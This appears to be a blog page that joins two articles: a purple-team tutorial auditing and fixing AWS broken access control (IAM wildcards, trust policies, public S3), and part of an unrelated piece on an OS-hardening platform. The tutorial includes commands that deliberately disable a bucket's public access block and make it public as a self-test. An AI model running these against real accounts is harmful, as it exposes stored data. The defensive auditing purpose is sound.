aws iam list-policies --scope Local --query 'Policies[].Arn' --output text | \
  tr '\t' '\n' | \
  while read -r arn; do
    version=$(aws iam get-policy --policy-arn "$arn" \
      --query 'Policy.DefaultVersionId' --output text)
    doc=$(aws iam get-policy-version --policy-arn "$arn" --version-id "$version" \
      --query 'PolicyVersion.Document' --output json)

    # Statement and Action may each be a single value or a list; normalize both
    filter='[.Statement] | flatten | .[]
      | select(.Effect == "Allow" and ([.Action] | flatten | any(. == "*")))'
    if echo "$doc" | jq -e "$filter" > /dev/null 2>&1; then
      echo "WILDCARD ACTION POLICY: $arn"
      echo "$doc" | jq "$filter"
    fi
  done
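IAM accepts Statement, Action, and Resource either as a single value or as a list, so a wildcard check has to normalize both shapes before comparing. A Python sketch of that normalization, which also flags service-wide wildcards such as iam:*; wildcard_actions is a hypothetical helper, and NotAction statements are out of scope here:

```python
import json


def as_list(value):
    """IAM accepts a single value or a list for Statement, Action and Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def wildcard_actions(policy_doc: dict) -> list:
    """Return wildcard actions ("*" or "service:*") granted by Allow statements."""
    found = []
    for stmt in as_list(policy_doc.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        for action in as_list(stmt.get("Action")):
            if action == "*" or action.endswith(":*"):
                found.append(action)
    return found


# Input is the document printed by: aws iam get-policy-version ... --output json
doc = json.loads('{"Statement": {"Effect": "Allow", '
                 '"Action": ["s3:GetObject", "iam:*"], "Resource": "*"}}')
print(wildcard_actions(doc))  # ['iam:*']
```

Service-wide wildcards are worth surfacing alongside the full "*": iam:* alone is enough for most of the privilege escalation paths covered in IAM EP08.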

Testing Trust Policy Abuse

# Find IAM roles with overly broad trust policies:
# wildcard principals, and cross-account principals in statements with no Condition
CURRENT_ACCOUNT=$(aws sts get-caller-identity --query Account --output text)

aws iam list-roles --query 'Roles[].RoleName' --output text | \
  tr '\t' '\n' | \
  while read -r role; do
    trust=$(aws iam get-role --role-name "$role" \
      --query 'Role.AssumeRolePolicyDocument' --output json 2>/dev/null)

    # Check for wildcard principals: "Principal": "*" or "Principal": {"AWS": "*"}
    if echo "$trust" | jq -e '.Statement[]
        | select(.Principal == "*"
                 or ((.Principal | type) == "object"
                     and ([.Principal.AWS] | flatten | any(. == "*"))))' > /dev/null 2>&1; then
      echo "WILDCARD TRUST PRINCIPAL: $role"
    fi

    # Check for cross-account trust without conditions
    echo "$trust" | jq -r '.Statement[]
        | select(.Condition == null and (.Principal | type) == "object")
        | [.Principal.AWS] | flatten | .[] | strings' 2>/dev/null | \
      grep -oE 'arn:aws:iam::[0-9]{12}' | cut -d: -f5 | sort -u | \
      while read -r acct; do
        if [ "$acct" != "$CURRENT_ACCOUNT" ]; then
          echo "CROSS-ACCOUNT TRUST WITHOUT CONDITION: $role trusts account $acct"
        fi
      done
  done
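The same normalization applies to trust policies, where Principal can be the string "*", an object whose AWS key holds a string or a list, or a service principal. A Python sketch, assuming the trust document has been loaded with json.loads; treating any cross-account principal without a Condition block as a finding is this sketch's own heuristic, not an AWS rule, and the helper names are hypothetical:

```python
from typing import Optional


def as_list(value):
    """Trust policy fields may be a single value or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def account_of(principal: str) -> Optional[str]:
    """Account ID from a bare 12-digit ID or an IAM ARN such as arn:aws:iam::<id>:root."""
    if len(principal) == 12 and principal.isdigit():
        return principal
    parts = principal.split(":")
    if len(parts) >= 5 and parts[0] == "arn" and parts[4].isdigit():
        return parts[4]
    return None


def trust_findings(trust_doc: dict, own_account: str) -> list:
    findings = []
    for stmt in as_list(trust_doc.get("Statement")):
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal")
        aws_principals = as_list(principal.get("AWS")) if isinstance(principal, dict) else []
        # "Principal": "*" and "Principal": {"AWS": "*"} both mean any AWS principal
        if principal == "*" or "*" in aws_principals:
            findings.append("wildcard principal")
            continue
        for p in aws_principals:
            acct = account_of(p)
            if acct and acct != own_account and "Condition" not in stmt:
                findings.append(f"cross-account trust without condition: {acct}")
    return findings


trust = {"Statement": [{"Effect": "Allow",
                        "Principal": {"AWS": "arn:aws:iam::999988887777:root"},
                        "Action": "sts:AssumeRole"}]}
print(trust_findings(trust, own_account="123456789012"))
# ['cross-account trust without condition: 999988887777']
```

A Condition such as sts:ExternalId or aws:PrincipalOrgID is what usually turns a cross-account trust from "any identity in that account" into a scoped relationship, which is why its absence is the thing to flag.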

Simulating S3 Exfiltration (on your own bucket — safe test)

# Create a test bucket, make it public, verify it's accessible without credentials
# Do this in a non-production account only

TEST_BUCKET="purple-team-test-$(date +%s)"
aws s3 mb s3://${TEST_BUCKET} --region us-east-1

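# Disable the bucket-level public access block (simulates the misconfiguration).
# If the account-level block (Fix 1 below) is enabled, put-bucket-policy below is
# rejected with AccessDenied: that is the control working, not a broken test.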
aws s3api put-public-access-block \
  --bucket "${TEST_BUCKET}" \
  --public-access-block-configuration \
  "BlockPublicAcls=false,IgnorePublicAcls=false,BlockPublicPolicy=false,RestrictPublicBuckets=false"

# Add a public-read bucket policy
aws s3api put-bucket-policy --bucket "${TEST_BUCKET}" --policy '{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::'"${TEST_BUCKET}"'/*"
  }]
}'

# Put a test file
echo "PURPLE_TEAM_TEST_DATA" | aws s3 cp - s3://${TEST_BUCKET}/test.txt

# Verify it's accessible without credentials
curl -s "https://${TEST_BUCKET}.s3.amazonaws.com/test.txt"
# Should return: PURPLE_TEAM_TEST_DATA

echo ""
echo "Test complete. Clean up:"
echo "aws s3 rb s3://${TEST_BUCKET} --force"

Blue Phase: What Detection Looks Like

What AWS Config Catches

Two managed rules cover the majority of S3 broken access control findings:

# Enable the S3 public access rules in AWS Config
# (requires Config to already be enabled)

# Rule 1: s3-bucket-public-read-prohibited
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-bucket-public-read-prohibited",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_BUCKET_PUBLIC_READ_PROHIBITED"
  },
  "Scope": {
    "ComplianceResourceTypes": ["AWS::S3::Bucket"]
  }
}'

# Rule 2: s3-account-level-public-access-blocks-periodic
aws configservice put-config-rule --config-rule '{
  "ConfigRuleName": "s3-account-level-public-access-blocks-periodic",
  "Source": {
    "Owner": "AWS",
    "SourceIdentifier": "S3_ACCOUNT_LEVEL_PUBLIC_ACCESS_BLOCKS_PERIODIC"
  }
}'

# Check current compliance status
aws configservice describe-compliance-by-config-rule \
  --config-rule-names s3-bucket-public-read-prohibited \
  --query 'ComplianceByConfigRules[].{Rule:ConfigRuleName,Compliance:Compliance.ComplianceType}'

What GuardDuty Catches

GuardDuty generates these findings for S3 broken access control:

| Finding Type | Trigger | Severity |
|---|---|---|
| Policy:S3/BucketAnonymousAccessGranted | Bucket policy or ACL grants public read/write | Medium |
| Policy:S3/BucketPublicAccessGranted | Same as above (alternate finding type) | Medium |
| Discovery:S3/MaliciousIPCaller | S3 GetObject from a known malicious IP | High |

# Query GuardDuty findings for S3 public access violations
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": ["Policy:S3/BucketAnonymousAccessGranted", "Policy:S3/BucketPublicAccessGranted"]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -r -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {type: .Type, bucket: .Resource.S3BucketDetails[0].Name, severity: .Severity}'

What IAM Access Analyzer Catches

IAM Access Analyzer continuously analyzes resource policies for external access — S3 buckets, IAM roles, KMS keys, SQS queues, Lambda functions. It generates a finding any time a resource policy grants access to a principal outside the AWS account (or AWS Organization boundary).

# Enable IAM Access Analyzer for the account
aws accessanalyzer create-analyzer \
  --analyzer-name "account-access-analyzer" \
  --type ACCOUNT

# List all active findings (external access granted)
aws accessanalyzer list-findings \
  --analyzer-arn $(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text) \
  --filter '{"status": {"eq": ["ACTIVE"]}}' \
  --query 'findings[].{Resource:resource,Principal:principal,Action:action}' \
  --output table

What the CloudTrail Event Looks Like

When an anonymous user accesses a public S3 object:

{
  "eventVersion": "1.09",
  "userIdentity": {
    "type": "AWSAccount",
    "accountId": "ANONYMOUS_PRINCIPAL",  
    "principalId": "ANONYMOUS_PRINCIPAL"
  },
  "eventTime": "2024-03-15T02:47:00Z",
  "eventSource": "s3.amazonaws.com",
  "eventName": "GetObject",
  "requestParameters": {
    "bucketName": "your-bucket-name",
    "key": "customer-data/records.csv"
  },
  "sourceIPAddress": "198.51.100.1",
  "userAgent": "python-requests/2.28.0"
}

The signal: userIdentity.type = "AWSAccount" with accountId = "ANONYMOUS_PRINCIPAL" on a GetObject event. This is a read from an anonymous, unauthenticated principal.

-- Athena query to find anonymous S3 GetObject events
-- Assumes CloudTrail S3 data events are enabled for the bucket, and a table
-- created with the standard CloudTrail DDL (requestParameters stored as a JSON
-- string, eventTime as an ISO 8601 string)

SELECT
  eventTime,
  sourceIPAddress,
  json_extract_scalar(requestParameters, '$.bucketName') AS bucket_name,
  json_extract_scalar(requestParameters, '$.key') AS object_key,
  userIdentity.type,
  userIdentity.accountId
FROM cloudtrail_logs
WHERE
  eventName = 'GetObject'
  AND userIdentity.type = 'AWSAccount'
  AND userIdentity.accountId = 'ANONYMOUS_PRINCIPAL'
  AND from_iso8601_timestamp(eventTime) > current_timestamp - interval '7' day
ORDER BY eventTime DESC
LIMIT 100;
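If the logs are not queryable in Athena yet, the same filter can run over raw CloudTrail log files, which CloudTrail delivers to S3 as gzipped JSON with a top-level Records array. A minimal Python sketch, assuming you have already downloaded the files; the ANONYMOUS_PRINCIPAL match mirrors the signal described above, and the helper names are hypothetical:

```python
import gzip
import json
from collections import Counter


def load_records(raw_gz: bytes) -> list:
    """Parse one gzipped CloudTrail log file (as delivered to S3) into its Records list."""
    return json.loads(gzip.decompress(raw_gz)).get("Records", [])


def is_anonymous_getobject(record: dict) -> bool:
    """Match the anonymous-read signal: GetObject by AWSAccount/ANONYMOUS_PRINCIPAL."""
    identity = record.get("userIdentity", {})
    return (record.get("eventName") == "GetObject"
            and identity.get("type") == "AWSAccount"
            and identity.get("accountId") == "ANONYMOUS_PRINCIPAL")


def top_anonymous_sources(records, n=10):
    """Count anonymous GetObject calls per source IP, busiest first."""
    counts = Counter(r.get("sourceIPAddress", "unknown")
                     for r in records if is_anonymous_getobject(r))
    return counts.most_common(n)


# Usage with a downloaded log file (path is a placeholder):
# with open("path/to/log.json.gz", "rb") as fh:
#     print(top_anonymous_sources(load_records(fh.read())))
```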

Purple Phase: The Structural Fix

Detection catches broken access control after the fact. The structural fix prevents it from being possible.

Fix 1: Account-Level S3 Public Access Block

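This is a single setting that prevents any bucket in the account from becoming public, regardless of bucket policy or ACL. S3 applies each block setting if it is enabled at either the account or the bucket level, so a bucket-level setting cannot loosen the account-level block.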

# Enable account-level S3 public access block
aws s3control put-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text) \
  --public-access-block-configuration \
  "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

# Verify
aws s3control get-public-access-block \
  --account-id $(aws sts get-caller-identity --query Account --output text)
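The account-level block wins because of how S3 combines the two levels: a setting applies if it is enabled at the account or at the bucket. A Python sketch of that combination, using the PublicAccessBlockConfiguration shape returned by get-public-access-block (access point settings, which S3 also evaluates, are ignored here, and the function name is hypothetical):

```python
from typing import Optional

SETTINGS = ("BlockPublicAcls", "IgnorePublicAcls", "BlockPublicPolicy", "RestrictPublicBuckets")


def effective_public_access_block(account: Optional[dict], bucket: Optional[dict]) -> dict:
    """Combine account- and bucket-level settings: a setting applies if either level enables it.

    Both arguments take a PublicAccessBlockConfiguration dict; pass None when
    that level has no configuration.
    """
    account = account or {}
    bucket = bucket or {}
    return {name: bool(account.get(name)) or bool(bucket.get(name)) for name in SETTINGS}


all_on = dict.fromkeys(SETTINGS, True)
all_off = dict.fromkeys(SETTINGS, False)
print(effective_public_access_block(all_on, all_off) == all_on)  # True
```

This is also why the bucket-level test above (disabling the bucket's block) cannot make a bucket public once the account-level block is on.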

Fix 2: SCP to Prevent Disabling the Public Access Block

An SCP (Service Control Policy) at the AWS Organizations level can prevent principals in member accounts, including account administrators, from disabling the public access block. SCPs do not restrict the organization's management account.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyS3PublicAccessBlockDisable",
      "Effect": "Deny",
      "Action": [
        "s3:PutAccountPublicAccessBlock",
        "s3:PutBucketPublicAccessBlock"
      ],
      "Resource": "*",
      "Condition": {
        "ArnNotLike": {
          "aws:PrincipalArn": "arn:aws:iam::*:role/s3-public-access-exception-role"
        }
      }
    }
  ]
}
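
# Save the policy above as scp-deny-s3-public-access.json, then create it
aws organizations create-policy \
  --name "DenyS3PublicAccessBlockDisable" \
  --type SERVICE_CONTROL_POLICY \
  --content file://scp-deny-s3-public-access.json \
  --description "Prevents disabling S3 public access block at account level"

# Creating the SCP does not enforce it: attach it to your organizational unit
aws organizations attach-policy \
  --policy-id "<policy-id>" \
  --target-id "<ou-id>"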
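To reason about whom a Deny statement like this actually blocks, its logic (deny the listed actions unless aws:PrincipalArn matches an ArnNotLike pattern) can be approximated in Python. This is a sketch under stated simplifications: fnmatch wildcards stand in for IAM's ARN matching, and only the Action list and that single condition are evaluated, whereas real IAM evaluation handles many more operators and keys. statement_denies is a hypothetical helper:

```python
from fnmatch import fnmatchcase


def as_list(value):
    """Policy fields may be a single string or a list of strings."""
    return value if isinstance(value, list) else [value]


def statement_denies(stmt: dict, action: str, principal_arn: str) -> bool:
    """Approximate whether one SCP Deny statement blocks `action` for `principal_arn`."""
    if stmt.get("Effect") != "Deny":
        return False
    # IAM action names are case-insensitive and may contain * wildcards
    if not any(fnmatchcase(action.lower(), a.lower()) for a in as_list(stmt.get("Action", []))):
        return False
    exempt = stmt.get("Condition", {}).get("ArnNotLike", {}).get("aws:PrincipalArn")
    if exempt is not None and any(fnmatchcase(principal_arn, p) for p in as_list(exempt)):
        return False  # ArnNotLike is false for this caller, so the Deny does not apply
    return True


stmt = {
    "Effect": "Deny",
    "Action": ["s3:PutAccountPublicAccessBlock", "s3:PutBucketPublicAccessBlock"],
    "Resource": "*",
    "Condition": {"ArnNotLike": {
        "aws:PrincipalArn": "arn:aws:iam::*:role/s3-public-access-exception-role"}},
}
print(statement_denies(stmt, "s3:PutAccountPublicAccessBlock",
                       "arn:aws:iam::123456789012:role/Admin"))  # True
```

The exception role is the only escape hatch, so who can assume that role matters as much as the SCP itself.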

Fix 3: IAM Policy Cleanup — Remove Wildcards

For IAM policies with wildcard actions, the fix is least-privilege replacement. This is not a quick operation — it requires analyzing actual usage and scoping to what is actually needed.

# Use IAM Access Analyzer policy generation to generate a least-privilege policy
# based on actual CloudTrail activity for a role
aws accessanalyzer start-policy-generation \
  --policy-generation-details '{
    "principalArn": "arn:aws:iam::123456789012:role/your-role-name"
  }' \
  --cloud-trail-details '{
    "accessRole": "arn:aws:iam::123456789012:role/access-analyzer-cloudtrail-role",
    "trails": [{
      "cloudTrailArn": "arn:aws:cloudtrail:us-east-1:123456789012:trail/your-trail",
      "regions": ["us-east-1", "us-west-2"],
      "allRegions": false
    }],
    "startTime": "2024-01-01T00:00:00Z",
    "endTime": "2024-03-01T00:00:00Z"
  }'

# Retrieve the generated policy
JOB_ID="<returned-job-id>"
aws accessanalyzer get-generated-policy --job-id "${JOB_ID}"

For a systematic audit approach, the AWS least privilege audit process in IAM EP09 covers how to move from wildcard policies to scoped permissions methodically across a multi-account environment.

Fix 4: IAM Access Analyzer with Automated Archiving

# Create an archive rule for known-good cross-account access
# (prevents alert fatigue from legitimate cross-account patterns)
aws accessanalyzer create-archive-rule \
  --analyzer-name "account-access-analyzer" \
  --rule-name "archive-legitimate-cross-account" \
  --filter '{
    "principal.AWS": {
      "contains": ["arn:aws:iam::111122223333:role/legitimate-cross-account-role"]
    }
  }'

Run This in Your Own Environment: A01 Audit

Run this in any AWS account you own or have read-only access to audit:

#!/bin/bash
# Purple Team EP04 — Broken Access Control (A01) Audit
# Safe to run with read-only IAM permissions

ACCOUNT=$(aws sts get-caller-identity --query Account --output text)
echo "Auditing account: ${ACCOUNT}"
echo "==============================="

echo ""
echo "[A01-1] S3 Account-Level Public Access Block"
aws s3control get-public-access-block --account-id "${ACCOUNT}" 2>/dev/null || \
  echo "  FINDING: Account-level public access block not configured"

echo ""
echo "[A01-2] S3 Buckets with Public Access"
aws s3api list-buckets --query 'Buckets[].Name' --output text | tr '\t' '\n' | \
  while read bucket; do
    status=$(aws s3api get-bucket-policy-status --bucket "$bucket" --output json 2>/dev/null | \
      jq -r '.PolicyStatus.IsPublic // "false"')
    if [ "$status" = "true" ]; then
      echo "  FINDING: Public bucket: $bucket"
    fi
  done

echo ""
echo "[A01-3] IAM Roles with Wildcard Trust Policies (first 50 roles)"
aws iam list-roles --query 'Roles[].RoleName' --output text | tr '\t' '\n' | head -50 | \
  while read -r role; do
    trust=$(aws iam get-role --role-name "$role" \
      --query 'Role.AssumeRolePolicyDocument.Statement' --output json 2>/dev/null)
    # Matches both "Principal": "*" and "Principal": {"AWS": "*"}
    if echo "$trust" | jq -e '[.] | flatten | .[] | select(.Principal == "*" or ((.Principal | type) == "object" and ([.Principal.AWS] | flatten | any(. == "*"))))' > /dev/null 2>&1; then
      echo "  FINDING: Wildcard trust principal in role: $role"
    fi
  done

echo ""
echo "[A01-4] IAM Access Analyzer — Active External Access Findings"
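ANALYZER=$(aws accessanalyzer list-analyzers --query 'analyzers[0].arn' --output text 2>/dev/null)
# --output text prints "None" (not an empty string) when no analyzer exists
if [ -z "$ANALYZER" ] || [ "$ANALYZER" = "None" ]; then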
  echo "  FINDING: IAM Access Analyzer not enabled"
else
  aws accessanalyzer list-findings \
    --analyzer-arn "${ANALYZER}" \
    --filter '{"status": {"eq": ["ACTIVE"]}}' \
    --query 'findings[].{Resource:resource,Type:resourceType}' \
    --output table
fi

⚠ Common Mistakes When Fixing Broken Access Control in AWS

Fixing the symptom at the bucket level without the account-level block. If you set RestrictPublicBuckets=true on individual buckets but leave the account-level block unset, the next bucket created by another engineer starts with public access possible again. The account-level block is the structural control; the bucket-level setting is defense-in-depth.

Not enabling CloudTrail S3 data events. CloudTrail management events capture bucket creation and policy changes. They do not capture GetObject and PutObject by default — that requires enabling S3 data events, which adds cost. Without data events, you cannot see who accessed what in a public bucket. If you can’t afford data events on all buckets, enable them on buckets containing sensitive data.

Treating IAM Access Analyzer findings as one-time. Access Analyzer runs continuously. A new resource policy that grants external access generates a new finding. If you archive findings without fixing the underlying policy, you lose visibility. Archive only findings that represent intentional, documented cross-account access.

Confusing “no GuardDuty findings” with “no problem.” GuardDuty’s Policy:S3/BucketAnonymousAccessGranted only fires when access is newly granted during GuardDuty’s monitoring window. A bucket that was made public before GuardDuty was enabled will not generate a finding — GuardDuty does not retroactively scan all bucket policies. Use AWS Config for retroactive compliance checks; use GuardDuty for real-time detection of new violations.

For the full IAM attack chain that broken access control enables — including IAM privilege escalation paths via iam:PassRole — see IAM series EP08. The privilege escalation analysis belongs alongside the access control audit.


Quick Reference

| Control | What It Does | AWS Service |
|---|---|---|
| Account-level S3 public access block | Prevents any bucket from becoming public | S3 Control |
| SCP: deny public access block disable | Prevents disabling the account-level block | Organizations |
| AWS Config: S3_BUCKET_PUBLIC_READ_PROHIBITED | Flags buckets that are or become public | AWS Config |
| GuardDuty: Policy:S3/BucketAnonymousAccessGranted | Detects new public access grants | GuardDuty |
| IAM Access Analyzer | Finds all resources with external access grants | Access Analyzer |
| CloudTrail S3 data events | Captures GetObject/PutObject for audit | CloudTrail |
| IAM policy generation | Generates least-privilege policy from actual usage | Access Analyzer |

Key Takeaways

  • Broken access control in AWS (OWASP A01) is the most common cloud security failure — IAM wildcards, public S3, and broad trust policies are the three primary manifestations
  • A public S3 bucket with 47 million records was active for six months without a single alert — because the detection controls (AWS Config rules, GuardDuty) weren’t enabled to look for it
  • The structural fix is the account-level S3 public access block enforced by SCP — detection tools catch violations; the SCP prevents the violation from being possible
  • IAM Access Analyzer provides continuous visibility into every resource that grants external access — enable it in every account
  • The red phase can be run with read-only permissions against your own account — the audit script above reveals your current A01 exposure in under five minutes
  • Fixing A01 without enabling the A09 controls (CloudTrail data events, GuardDuty, AWS Config) leaves you blind to whether the fix is working
  • Use Access Analyzer’s policy generation feature to move from wildcard policies to least-privilege without guessing

What’s Next

EP05 covers MFA fatigue attacks — how the Uber and Okta breaches worked at the authentication layer, how to simulate push-notification fatigue in a test environment, and the structural fix: phishing-resistant MFA using FIDO2 hardware keys. The identity layer is where most cloud compromises start — understanding how push MFA fails is the prerequisite for knowing why hardware keys are the only structural answer.

Get EP05 in your inbox when it publishes → subscribe at linuxcent.com

Stratum — OS Hardening as a Platform

Reading Time: 5 minutes

OS Hardening as Code, Episode 6
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate · Stratum Platform


TL;DR

  • Stratum is open-source under Apache 2.0 — the engine, blueprint format, scanner, and Pipeline API are all available on GitHub
  • The platform follows the same open-core model as Terraform/OpenTofu and Cilium/Isovalent: OSS core, self-hostable, extendable
  • Three extension points: custom compliance controls, provider plugins (add new cloud providers), pipeline integrations
  • Architecture: Blueprint YAML → Engine → Provider Layer → Ansible-Lockdown → OpenSCAP → Golden Image → Pipeline API
  • The series taught the user-facing interface for five episodes; EP06 covers what’s underneath and how to build on it
  • Installation is a single helm install or docker compose up — the platform runs in your environment

The Series Arc, Inverted

EP01 showed that default cloud AMIs arrive pre-broken. By the time you reach EP06, that problem has a complete solution:

EP01 — The problem:
  Default AMI → Production → Security audit finds gaps
  (unknown OS baseline, unverified hardening, no evidence)

EP06 — The solution:
  HardeningBlueprint YAML
           ↓
    stratum build          ← EP02 (blueprint as code)
    --provider aws,gcp     ← EP03 (multi-cloud)
           ↓
    OpenSCAP scan          ← EP04 (compliance grading)
    Grade: A (94/100)
           ↓
    POST /api/pipeline/scan ← EP05 (CI/CD gate)
    Result: pass
           ↓
    Production deployment
    (Grade A, SARIF attached, blueprint version-controlled)

For five episodes, you’ve used Stratum as a user. This episode covers what it looks like to run it yourself, extend it, and build on it.


I’ve spent years watching infrastructure teams solve the same OS hardening problem in slightly different ways. Custom scripts that drift. OpenSCAP runs that produce evidence no one reads. Compliance checklists completed by humans who have competing priorities.

The tools exist. ansible-lockdown applies CIS controls reliably. OpenSCAP verifies them accurately. CI/CD systems can enforce any check you can express as pass/fail. The gap isn’t the tooling; it’s the integration layer that ties them together into a reproducible, auditable pipeline.

Stratum is that integration layer, open-sourced.

The philosophy is the same as Terraform applied to OS security posture: declare the desired state in a version-controlled file, apply it reproducibly, and verify it automatically. The skip-at-2am problem disappears not because engineers are more careful, but because there’s no step to skip.


The Architecture

┌─────────────────────────────────────────────────────────┐
│                 HardeningBlueprint YAML                  │
│         (version-controlled, provider-agnostic)          │
└─────────────────────┬───────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────────────────┐
│                   Stratum Engine                         │
│                  (Apache 2.0, OSS)                       │
│  ┌─────────────┐  ┌──────────────┐  ┌────────────────┐  │
│  │  Blueprint  │  │   Provider   │  │    Scheduler   │  │
│  │   Parser    │  │    Layer     │  │  (parallel     │  │
│  │             │  │  AWS  GCP    │  │   multi-cloud  │  │
│  │  Validates  │  │  Azure DO    │  │   builds)      │  │
│  │  schema +   │  │  Linode      │  │                │  │
│  │  overrides  │  │  Proxmox     │  │                │  │
│  └─────────────┘  └──────────────┘  └────────────────┘  │
└─────────────────────┬───────────────────────────────────┘
                      │
           ┌──────────┴──────────┐
           ▼                     ▼
  ┌──────────────────┐   ┌─────────────────┐
  │ Ansible-Lockdown │   │  OpenSCAP       │
  │  Runner          │   │  Scanner        │
  │                  │   │                 │
  │  UBUNTU22-CIS    │   │  A-F grade      │
  │  RHEL8-STIG      │   │  SARIF export   │
  │  Custom roles    │   │  Drift detect   │
  └────────┬─────────┘   └────────┬────────┘
           │                      │
           └──────────┬───────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Golden Image          │
         │   (AMI / GCP / Azure)   │
         │   + compliance metadata │
         └────────────┬────────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Pipeline API          │
         │   (Apache 2.0, OSS)     │
         │                         │
         │ POST /api/pipeline/scan │
         │  ← CI/CD gate           │
         └─────────────────────────┘

Every component is open-source under Apache 2.0. The engine, provider layer, Ansible runner, OpenSCAP scanner, and Pipeline API are all in the repository. Nothing is locked to a hosted service.


Installation

Stratum runs as a set of containers. Kubernetes or Docker Compose both work.

Kubernetes (Helm):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Install Stratum in your cluster using the bundled Helm chart
helm install stratum ./deploy/helm/stratum \
  --namespace stratum-system \
  --create-namespace \
  --set config.providers.aws.enabled=true \
  --set config.providers.gcp.enabled=true \
  --set config.storageClass=standard

# Verify
kubectl get pods -n stratum-system
# NAME                          READY   STATUS    RESTARTS   AGE
# stratum-engine-0              1/1     Running   0          2m
# stratum-scanner-7d9b4-abc12   1/1     Running   0          2m
# stratum-api-6c8f5-def34       1/1     Running   0          2m

Docker Compose (single-node):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Configure providers
cp config/providers.example.yaml config/providers.yaml
vim config/providers.yaml  # add AWS/GCP/Azure credentials

# Start
docker compose up -d

# Stratum is available at http://localhost:8080

The Three Extension Points

1. Custom Compliance Controls

Add controls that aren’t in the CIS benchmark — internal policies, org-specific security requirements, or controls from other frameworks:

# controls/custom-audit-policy.yaml
id: CUSTOM-001
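title: Audit logs must be kept on rotation (90-day retention policy)
description: All instances must retain audit logs for 90 days minimum; keep_logs rotates logs without deleting old ones, so rotation never cuts retention short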
severity: high
benchmark: custom
check:
  type: command
  command: "grep -E '^max_log_file_action' /etc/audit/auditd.conf"
  expected: "max_log_file_action = keep_logs"
remediation:
  type: ansible
  task: |
    - name: Configure audit log retention
      ansible.builtin.lineinfile:
        path: /etc/audit/auditd.conf
        regexp: '^max_log_file_action'
        line: 'max_log_file_action = keep_logs'
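The check above compares one grep'd line against an exact string. That means KEEP_LOGS in upper case (some distribution defaults write these values in capitals, such as ROTATE) or different spacing around = would fail it. Below is a sketch of a more tolerant local equivalent, useful for testing the control against sample files before deploying it. auditd_settings and custom_001_passes are hypothetical names, not part of Stratum.

```python
from __future__ import annotations

import re

# "key = value" lines in auditd.conf, tolerant of surrounding whitespace
_LINE = re.compile(r"^\s*([A-Za-z_]+)\s*=\s*(\S+)\s*$")


def auditd_settings(conf_text: str) -> dict[str, str]:
    """Parse auditd.conf text into {key: value}, skipping comments and blanks."""
    settings = {}
    for line in conf_text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        match = _LINE.match(line)
        if match:
            # Normalise case so KEEP_LOGS and keep_logs compare equal
            settings[match.group(1)] = match.group(2).lower()
    return settings


def custom_001_passes(conf_text: str) -> bool:
    """Local equivalent of the CUSTOM-001 check: rotation must keep old logs."""
    return auditd_settings(conf_text).get("max_log_file_action") == "keep_logs"


sample = """# /etc/audit/auditd.conf
max_log_file = 8
max_log_file_action = KEEP_LOGS
"""
print(custom_001_passes(sample))                          # True
print(custom_001_passes("max_log_file_action = ROTATE\n"))  # False
```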

Deploy the custom control:

stratum controls deploy --file controls/custom-audit-policy.yaml

Reference it in any blueprint:

compliance:
  benchmark: cis-l1
  controls: all
  additional_controls:
    - CUSTOM-001

Custom controls appear in the grade calculation and SARIF output alongside CIS controls.
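How a custom control shifts the grade is easiest to see with numbers. The sketch below assumes a simple pass-percentage score and letter bands (A at 90 and above, B at 80, and so on). Stratum's actual weighting is not described here, so treat THRESHOLDS, score, grade, and gate_passes as hypothetical. In the example, one failing CIS control out of 18 scores 94, an A. Adding a failing CUSTOM-001 drops the score to 89, a B, which a gate requiring A would reject.

```python
from __future__ import annotations

# Hypothetical letter bands; not Stratum's documented formula.
THRESHOLDS = [(90, "A"), (80, "B"), (70, "C"), (60, "D")]
ORDER = "ABCDF"  # best to worst


def score(results: dict[str, bool]) -> int:
    """Percentage of controls that passed; custom and benchmark controls count alike."""
    if not results:
        return 0
    return round(100 * sum(results.values()) / len(results))


def grade(points: int) -> str:
    for floor, letter in THRESHOLDS:
        if points >= floor:
            return letter
    return "F"


def gate_passes(actual: str, minimum: str) -> bool:
    """A grade passes if it is at least as good as the required minimum."""
    return ORDER.index(actual) <= ORDER.index(minimum)


cis = {f"CIS-{i}": True for i in range(1, 18)}  # 17 passing controls
cis["CIS-18"] = False
print(score(cis), grade(score(cis)))                  # 94 A
with_custom = {**cis, "CUSTOM-001": False}
print(score(with_custom), grade(score(with_custom)))  # 89 B
print(gate_passes(grade(score(with_custom)), "A"))    # False
```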

2. Provider Plugins

Add support for a new cloud provider by implementing the provider interface:

# providers/custom_provider.py
from stratum.providers import BaseProvider

class CustomProvider(BaseProvider):
    name = "my-cloud"

    def provision_build_instance(self, blueprint, config):
        # Launch a build instance on your cloud
        # Return: instance_id, connection_details
        ...

    def create_image(self, instance_id, blueprint, grade):
        # Snapshot the instance into an image
        # Tag with compliance metadata
        # Return: image_id
        ...

    def terminate_instance(self, instance_id):
        # Clean up the build instance
        ...

Register the plugin:

stratum providers register --file providers/custom_provider.py --name my-cloud

The provider is now available as --provider my-cloud in all stratum build commands.
